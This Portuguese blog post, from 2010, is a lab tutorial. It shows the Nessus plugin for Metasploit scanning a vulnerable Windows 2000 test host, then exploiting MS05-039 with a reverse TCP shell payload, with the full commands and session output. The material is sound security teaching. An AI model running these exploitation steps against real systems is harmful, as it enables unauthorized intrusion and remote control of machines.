você está aqui: Home  → Arquivo de Mensagens Programação Shell Linux: Inscrições Abertas

Brincando com o plugin do Nessus para o Metasploit

Colaboração: Alexandro Silva

Data de Publicação: 12 de outubro de 2010

Recentemente o desenvolvedor Zate Berg disponibilizou um plug-in do Nessus para o Metasploit Framework ele está disponivel na versão em desenvolvimento do MSF.

Para os testes utilizei o seguinte cenário:

  • Host Debian com Nessus e Metasploit
  • Host Alvo com Windows 2000 "bugado até a alma"

Inicialmente atualizei o MSF e o Nessus e depois parti para a diversão

cd /tmp/pentest_tools/trunk
svn update
/opt/nessus/sbin/nessus-update-plugins
/opt/nessus/sbin/nessus-service &
./msconsole

| |                | |     (_) |
_ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 592 exploits - 302 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10505 updated today (2010.09.28)

msf>

Diversão :)

Carregando o Nessus plug-in

msf> load nessus

[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
Conectando...
msf> nessus_connect localhost:8834 ok

[+] Username:
alexos
[+] Password:
*******
[*] Connecting to https://localhost:8834/ as alexos
[*] Authenticated
Listando as políticas existentes no Nessus
msf> nessus_policy_list

[+] Nessus Policy List

ID  Name    Owner   visability
—  ----    -----    ----------
1   attack  alexos  private

Iniciando a varredura

msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6

[*] Creating scan from policy number 1, called "alexoscorelabs" and scanning 192.168.0.6
[*] Scan started.  uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0
Finalizada a verredura é hora de checar o relatório
msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8

[+] Host Info

Port  Protocol  Severity  Service Name  Sev 0  Sev 1  Sev 2  Sev 3
—--   --------   --------   ------ ------  -----  -----  -----  -----
0     icmp      1         general       0      2      0      0
0     tcp       3         general       0      9      0      1
0     udp       1         general       0      1      0      0
21    tcp       3         ftp           1      4      2      2
135   tcp       3         epmap         1      1      0      1
135   udp       3         epmap?        0      0      0      1
137   udp       1         netbios-ns    0      1      0      0
139   tcp       1         smb           1      1      0      0
445   tcp       3         cifs          1      10     2      12
1025  tcp       3         dce-rpc       1      1      0      1
1028  udp       1         dce-rpc       0      1      0      0
5800  tcp       1         www           1      4      0      0
5801  tcp       1         www           1      3      0      0
5900  tcp       3         vnc           1      2      0      1
5901  tcp       1         vnc           1      3      0      0
Obtendo informações sobre as vulnerabilidades existentes na porta 445 ( smb ) do alvo
msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

[+] Port Info

Port            Severity  PluginID  Plugin Name                                                                                                           CVSS2  Exploit?  CVE            Risk Factor  CVSS Vector
—--             --------   --------   -----------                                                                                                           -----   --------  ---             -----------   -----------
cifs (445/tcp)  1         10736     DCE Services Enumeration                                                                                              none   .         .              None         .
cifs (445/tcp)  1         10785     SMB NativeLanManager Remote System Information Disclosure                                                             none   .         .              None         .
cifs (445/tcp)  1         10394     SMB Log In Possible                                                                                                   none   false     CVE-1999-0504  None         .
cifs (445/tcp)  1         11011     SMB Service Detection                                                                                                 none   .         .              None         .
cifs (445/tcp)  1         10395     SMB Shares Enumeration                                                                                                none   .         .              None         .
cifs (445/tcp)  1         26920     Windows SMB NULL Session Authentication                                                                               none   false     CVE-1999-0519  None         .
cifs (445/tcp)  1         17651     Obtains the password policy                                                                                           none   .         .              None         .
cifs (445/tcp)  3         22034     MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check)           7.5    true      CVE-2006-1314  High         CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
cifs (445/tcp)  3         19407     MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check)  10.0   true      CVE-2005-1984  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         12209     MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check)                                       10.0   true      CVE-2003-0533  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         12054     MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check)                              10.0   true      CVE-2003-0818  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  1         10859     SMB LsaQueryInformationPolicy Function SID Enumeration                                                                none   true      CVE-2000-1200  None         .
cifs (445/tcp)  3         22194     MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check)           10.0   true      CVE-2006-3439  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp)  3         19408     MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check)    10.0   true      CVE-2005-1983  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp)  3         21193     MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check)           10.0   false     CVE-2005-2120  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  2         18602     SMB svcctl MSRPC Interface SCM Service Enumeration                                                                    5.0    false     CVE-2005-2150  Medium       CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp)  2         18585     SMB Service Enumeration via \srvsvc                                                                                   5.0    false     CVE-2005-2150  Medium       CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp)  3         35362     MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)                 10.0   .         CVE-2008-4834  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  1         26917     SMB Registry : Nessus Cannot Access the Windows Registry                                                              none   .         .              None         .
cifs (445/tcp)  3         18502     MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check)                      10.0   false     CVE-2005-1206  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         11835     MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check)                                      10.0   true      CVE-2003-0715  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  1         10860     SMB Use Host SID to Enumerate Local Users                                                                             none   true      CVE-2000-1200  None         .
cifs (445/tcp)  3         11808     MS03-026: Microsoft RPC Interface Buffer Overrun (823980)                                                             10.0   true      CVE-2003-0352  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         11110     MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830)                      7.5    true      CVE-2002-0724  High         CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
Usando o MSF explorei a vulnerabilidade MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution
msf> use exploit/windows/smb/ms05_039_pnp

msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6

msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp

msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3

msf exploit(ms05_039_pnp)> exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the SMB service...
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ...
[*] Calling the vulnerable function...
[*] Sending stage (240 bytes) to 192.168.0.6
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010
[*] Server did not respond, this is expected
[*] The server should have executed our payload


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.


C:\WINNT\system32>
C:\WINNT\system32> ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.0.6
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.2

Estes MSF add-ons serão sempre bem-vindos, outra integração interessante é a do Metasploit com o Ethercap para testes de MITM.

Fonte: http://blog.alexos.com.br/?p=1996&lang=en

Blog do autor - http://www.alexos.org


Veja a relação completa dos artigos de Alexandro Silva